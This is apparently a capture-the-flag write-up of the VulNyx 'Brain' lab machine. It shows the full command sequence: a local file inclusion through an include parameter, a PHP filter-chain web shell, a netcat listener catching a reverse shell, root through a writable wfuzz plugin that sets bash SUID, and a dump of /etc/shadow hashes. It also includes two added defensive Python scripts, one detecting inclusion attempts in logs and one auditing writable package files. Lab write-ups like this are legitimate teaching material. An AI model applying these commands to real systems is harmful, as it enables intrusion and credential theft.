Vlx_Brain

Target source: https://vulnyx.com/

Difficulty: Easy

I. Information Gathering

1. Host Discovery

┌──(root㉿kali)-[~]
└─# nmap -sn 192.168.2.0/24
Starting Nmap 7.98 ( https://nmap.org ) at 2026-04-01 16:14 +0800
Nmap scan report for 192.168.2.1
Host is up (0.00100s latency).
MAC Address: 0A:00:27:00:00:06 (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00066s latency).
MAC Address: 08:00:27:2E:84:EB (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.13
Host is up (0.00057s latency).
MAC Address: 08:00:27:26:F4:71 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 7.58 seconds

Target IP: 192.168.2.13

2. Port Scanning

1) Full port scan

┌──(root㉿kali)-[~]
└─# nmap --min-rate 10000 -p- 192.168.2.13
Starting Nmap 7.98 ( https://nmap.org ) at 2026-04-01 16:14 +0800
Nmap scan report for 192.168.2.13
Host is up (0.00017s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:26:F4:71 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 6.61 seconds

Open ports: 22, 80

2) Detailed service scan

┌──(root㉿kali)-[~]
└─# nmap --min-rate 10000 -sT -sC -sV -O -p22,80 192.168.2.13
Starting Nmap 7.98 ( https://nmap.org ) at 2026-04-01 16:14 +0800
Nmap scan report for 192.168.2.13
Host is up (0.0011s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 32:95:f9:20:44:d7:a1:d1:80:a8:d6:95:91:d5:1e:da (RSA)
| 256 07:e7:24:38:1d:64:f6:88:9a:71:23:79:b8:d8:e6:57 (ECDSA)
|_ 256 58:a6:da:1e:0f:89:42:2b:ba:de:00:fc:71:78:3d:56 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
MAC Address: 08:00:27:26:F4:71 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.24 seconds

3) UDP scan

┌──(root㉿kali)-[~]
└─# nmap -sU --top-ports 100 192.168.2.13
Starting Nmap 7.98 ( https://nmap.org ) at 2026-04-01 16:15 +0800
Nmap scan report for 192.168.2.13
Host is up (0.0014s latency).
All 100 scanned ports on 192.168.2.13 are in ignored states.
Not shown: 57 closed udp ports (port-unreach), 43 open|filtered udp ports (no-response)
MAC Address: 08:00:27:26:F4:71 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 57.06 seconds

II. Web Penetration

1. Port 80

Browsing to port 80 shows a list of process tasks.

2. Directory Scanning

┌──(root㉿kali)-[~]
└─# gobuster dir -u http://192.168.2.13 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,js,txt,bak

index.php (Status: 200) [Size: 361]

Only index.php was found.

3. FUZZ

Try fuzzing for a parameter name:

┌──(root㉿kali)-[~/miaosec]
└─# ffuf -u http://192.168.2.13/index.php?FUZZ=/etc/passwd -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -fs 20 -ac

include [Status: 200, Size: 1750, Words: 125, Lines: 34, Duration: 1ms]

This finds a parameter named include.

Use it to read /etc/passwd:

┌──(root㉿kali)-[~]
└─# curl http://192.168.2.13/index.php?include=/etc/passwd
<pre>
runnable tasks:
S task PID tree-key switches prio wait-time sum-exec sum-sleep
-----------------------------------------------------------------------------------------------------------
S systemd 1 2927.102286 1731 120 0.000000 509.025216 0.000000 0 0 /
</pre>

root:x:0:0:root:/root:/bin/bash
...
ben:x:1000:1000:ben,,,:/home/ben:/bin/bash

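This reveals another user, ben.

III. Getting a Shell

Method 1: /proc/sched_debug

/proc/sched_debug is a virtual debugging file provided by the Linux kernel in the /proc pseudo-filesystem. It outputs detailed run state and debugging information for the kernel scheduler (mainly CFS, the Completely Fair Scheduler), and is an important tool for system performance analysis, troubleshooting scheduling problems and kernel debugging. It lists every process task.

The task list exposes the login credentials of the user ben.

Log in with them directly: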

┌──(root㉿kali)-[~/Tool]
└─# ssh ben@192.168.2.13

ben@brain:~$ id
uid=1000(ben) gid=1000(ben) groups=1000(ben)

Method 2: PHP pseudo-protocols (stream wrappers)

Try using a PHP wrapper to read the source of index.php:

┌──(root㉿kali)-[~]
└─# curl http://192.168.2.13/index.php?include=php://filter/read=convert.base64-encode/resource=index.php
<pre>
runnable tasks:
S task PID tree-key switches prio wait-time sum-exec sum-sleep
-----------------------------------------------------------------------------------------------------------
S systemd 1 2927.102286 1731 120 0.000000 509.025216 0.000000 0 0 /
</pre>

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

Decode it:

┌──(root㉿kali)-[~]
└─# echo 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 | base64 -d
<pre>
runnable tasks:
S task PID tree-key switches prio wait-time sum-exec sum-sleep
-----------------------------------------------------------------------------------------------------------
S systemd 1 2927.102286 1731 120 0.000000 509.025216 0.000000 0 0 /
</pre>

<?php
$filename = $_GET['include'];
include($filename);
?>

Use a filter chain to get a shell. Tool: synacktiv/php_filter_chain_generator (GitHub)

  1. Build the payload
┌──(root㉿kali)-[~/Tool]
└─# python3 php_filter_chain_generator.py --chain "<?php system(\$_GET['a']);?>"
[+] The following gadget chain will generate the following code : <?php system($_GET['a']);?> (base64 value: PD9waHAgc3lzdGVtKCRfR0VUWydhJ10pOz8+)
  2. Run the reverse-shell command
  3. Start a listener; the shell connects back
┌──(root㉿kali)-[~/Tool]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.2.4] from (UNKNOWN) [192.168.2.13] 49404
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
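
Both methods above leave the same trace in the web server's access log: an include parameter carrying a system path such as /proc/sched_debug, or a php:// wrapper. The detector below is an added example, not part of the original write-up; the log lines are constructed, and the regular expressions and the CHAIN_THRESHOLD value are assumptions.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Apache "combined" format: capture the client address and the request target.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*"')
WRAPPER_RE = re.compile(r"^(php|data|expect|phar|zip|file|glob)://", re.I)
SYSTEM_PATH_RE = re.compile(r"^/(etc|proc|root|home|var/log)(/|$)")
CHAIN_THRESHOLD = 5  # assumed cut-off: a plain source read uses one convert.* filter


def classify(value):
    """Return the reasons one decoded parameter value looks like file inclusion."""
    reasons = []
    if WRAPPER_RE.match(value):
        reasons.append("stream-wrapper")
    if value.lower().startswith("php://filter") and value.count("convert.") >= CHAIN_THRESHOLD:
        reasons.append("filter-chain")
    if SYSTEM_PATH_RE.match(value):
        reasons.append("system-path")
    return reasons


def scan(lines):
    """Return (client, parameter, reasons) for every suspicious query parameter."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        # parse_qsl percent-decodes, so %2Fproc%2Fsched_debug is seen as a path.
        for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            reasons = classify(value)
            if reasons:
                findings.append((client, name, reasons))
    return findings


# Constructed sample lines (not taken from the target's real access log).
_PRE = '192.168.2.4 - - [01/Apr/2026:16:20:00 +0800] "GET /index.php'
_END = ' HTTP/1.1" 200 361 "-" "curl"'
_CHAIN = "php://filter/" + "|".join(["convert.iconv.UTF8.UTF7", "convert.base64-decode"] * 4)
SAMPLE_LOG = [
    _PRE + _END,
    _PRE + "?include=/etc/passwd" + _END,
    _PRE + "?include=%2Fproc%2Fsched_debug" + _END,
    _PRE + "?include=php://filter/read=convert.base64-encode/resource=index.php" + _END,
    _PRE + "?include=" + _CHAIN + "/resource=php://temp" + _END,
]
```

Calling scan(SAMPLE_LOG) flags four of the five lines; the plain request for /index.php is not reported.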

IV. Privilege Escalation

1. Escalating to ben

Inspecting the running processes reveals the password of the user ben.

ben:B3nP4zz

The login succeeds:

┌──(root㉿kali)-[~/Tool]
└─# ssh ben@192.168.2.13

ben@brain:~$ id
uid=1000(ben) gid=1000(ben) groups=1000(ben)

2. Escalating to root

Check sudo -l:

ben@brain:~$ sudo -l
Matching Defaults entries for ben on Brain:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User ben may run the following commands on Brain:
(root) NOPASSWD: /usr/bin/wfuzz

Also look for writable files:

ben@brain:~$ find / \( -path /proc -o -path /sys \) -prune -o -perm -o=w -type f -print 2>/dev/null
/usr/lib/python3/dist-packages/wfuzz/plugins/payloads/range.py

ben@brain:~$ ls -ld /usr/lib/python3/dist-packages/wfuzz/plugins/payloads/range.py
-rwxrwxrwx 1 root root 1519 Apr 19 2023 /usr/lib/python3/dist-packages/wfuzz/plugins/payloads/range.py

The range.py module used by wfuzz is writable, so append code to it:

ben@brain:~$ echo -e 'import os\nos.system("chmod 4755 /bin/bash")' >> /usr/lib/python3/dist-packages/wfuzz/plugins/payloads/range.py

Use the -z option to load the range payload:

ben@brain:~$ sudo wfuzz -c -z range 1-2

ben@brain:~$ ls -la /bin/bash
-rwsr-xr-x 1 root root 1168776 Apr 18 2019 /bin/bash

Root privileges obtained:

ben@brain:~$ /bin/bash -p
bash-5.0# id
uid=1000(ben) gid=1000(ben) euid=0(root) groups=1000(ben)
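
The escalation works because a module imported by a sudo-permitted tool is writable by an unprivileged user. The check below is an added example, not from the original write-up: it walks a package directory and reports files and directories that group or other can write. The temporary tree and dummy.py are constructed stand-ins for /usr/lib/python3/dist-packages/wfuzz.

```python
import os
import stat
import tempfile


def writable_by_non_owner(path):
    """True if group or other may write to path (symlinks are not followed)."""
    mode = os.lstat(path).st_mode
    return not stat.S_ISLNK(mode) and bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_package(package_dir):
    """Return sorted relative paths under package_dir that a non-owner can modify.

    Directories count as well: write access there allows replacing a module.
    """
    findings = []
    for root, _dirs, files in os.walk(package_dir):
        for path in [root] + [os.path.join(root, name) for name in files]:
            if writable_by_non_owner(path):
                findings.append(os.path.relpath(path, package_dir))
    return sorted(findings)


def build_sample_tree(base):
    """Constructed stand-in for the wfuzz package; file contents are dummies."""
    pkg = os.path.join(base, "wfuzz")
    payloads = os.path.join(pkg, "plugins", "payloads")
    os.makedirs(payloads)
    for directory in (pkg, os.path.dirname(payloads), payloads):
        os.chmod(directory, 0o755)
    # range.py carries the mode shown in the write-up (-rwxrwxrwx).
    for name, mode in (("range.py", 0o777), ("dummy.py", 0o644)):
        path = os.path.join(payloads, name)
        with open(path, "w") as handle:
            handle.write("# placeholder\n")
        os.chmod(path, mode)
    return pkg


def demo():
    """Audit the constructed tree and return the findings."""
    with tempfile.TemporaryDirectory() as base:
        return audit_package(build_sample_tree(base))


if __name__ == "__main__":
    print(demo())
```

On a real host, point audit_package at the package directory of each tool listed by sudo -l; an empty list is the expected result.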

V. Reading the Flags

bash-5.0# cat /root/root.txt /home/ben/user.txt 
08cxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
4bexxxxxxxxxxxxxxxxxxxxxxxxxxxxx

Alternatively, the -w option can read a file as the wordlist:

ben@brain:~$ sudo /usr/bin/wfuzz -w /etc/shadow -u http://192.168.2.4/FUZZ

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.3.4 - The Web Fuzzer *
********************************************************

Target: http://192.168.2.4/FUZZ
Total requests: 26

==================================================================
ID Response Lines Word Chars Payload
==================================================================

000002: C=404 13 L 32 W 335 Ch "daemon:*:18651:0:99999:7:::"
000003: C=404 13 L 32 W 335 Ch "bin:*:18651:0:99999:7:::"
000001: C=404 13 L 32 W 335 Ch "root:$6$dYmzBegce95vTVtb$sE8QJJjcUj3Pr7OHs.ynQZhHQGFaH2tvvbIOpVYAfFcsfRjjap1Xn4r03qY0VXRpCcZcU.9YNNAC3yuP8kf0.1:19466:0:99999:7:::"
000006: C=404 13 L 32 W 335 Ch "games:*:18651:0:99999:7:::"
000008: C=404 13 L 32 W 335 Ch "lp:*:18651:0:99999:7:::"
000004: C=404 13 L 32 W 335 Ch "sys:*:18651:0:99999:7:::"
000005: C=404 13 L 32 W 335 Ch "sync:*:18651:0:99999:7:::"
000007: C=404 13 L 32 W 335 Ch "man:*:18651:0:99999:7:::"
000013: C=404 13 L 32 W 335 Ch "www-data:*:18651:0:99999:7:::"
000011: C=404 13 L 32 W 335 Ch "uucp:*:18651:0:99999:7:::"
000012: C=404 13 L 32 W 335 Ch "proxy:*:18651:0:99999:7:::"
000014: C=404 13 L 32 W 335 Ch "backup:*:18651:0:99999:7:::"
000016: C=404 13 L 32 W 335 Ch "irc:*:18651:0:99999:7:::"
000015: C=404 13 L 32 W 335 Ch "list:*:18651:0:99999:7:::"
000019: C=404 13 L 32 W 335 Ch "_apt:*:18651:0:99999:7:::"
000017: C=404 13 L 32 W 335 Ch "gnats:*:18651:0:99999:7:::"
000018: C=404 13 L 32 W 335 Ch "nobody:*:18651:0:99999:7:::"
000020: C=404 13 L 32 W 335 Ch "systemd-timesync:*:18651:0:99999:7:::"
000021: C=404 13 L 32 W 335 Ch "systemd-network:*:18651:0:99999:7:::"
000023: C=404 13 L 32 W 335 Ch "messagebus:*:18651:0:99999:7:::"
000025: C=404 13 L 32 W 335 Ch "systemd-coredump:!!:18651::::::"
000024: C=404 13 L 32 W 335 Ch "sshd:*:18651:0:99999:7:::"
000026: C=404 13 L 32 W 335 Ch "ben:$6$UHPEI8/0TIe9ujN6$tAiJp2x3QN0DH3MSCMYgyAUA241o2CWJ47agef1GfAMatBw5i3.MMocpoq7kvBnPNtQupCrvIRQtfnV5OFkcD0:19466:0:99999:7:::"
000022: C=404 13 L 32 W 335 Ch "systemd-resolve:*:18651:0:99999:7:::"
000010: C=404 13 L 32 W 335 Ch "news:*:18651:0:99999:7:::"
000009: C=404 13 L 32 W 335 Ch "mail:*:18651:0:99999:7:::"

Total time: 1.063881
Processed Requests: 26
Filtered Requests: 0
Requests/sec.: 24.43881

This yields two entries:

root:$6$dYmzBegce95vTVtb$sE8QJJjcUj3Pr7OHs.ynQZhHQGFaH2tvvbIOpVYAfFcsfRjjap1Xn4r03qY0VXRpCcZcU.9YNNAC3yuP8kf0.1:19466:0:99999:7:::
ben:$6$UHPEI8/0TIe9ujN6$tAiJp2x3QN0DH3MSCMYgyAUA241o2CWJ47agef1GfAMatBw5i3.MMocpoq7kvBnPNtQupCrvIRQtfnV5OFkcD0:19466:0:99999:7:::

However, the passwords could not be cracked.


Vlx_Brain
http://miao-sec.github.io/Vulnyx/Vlx-Brain/
Author: Miao
Published: April 1, 2026
License: BY-MIAO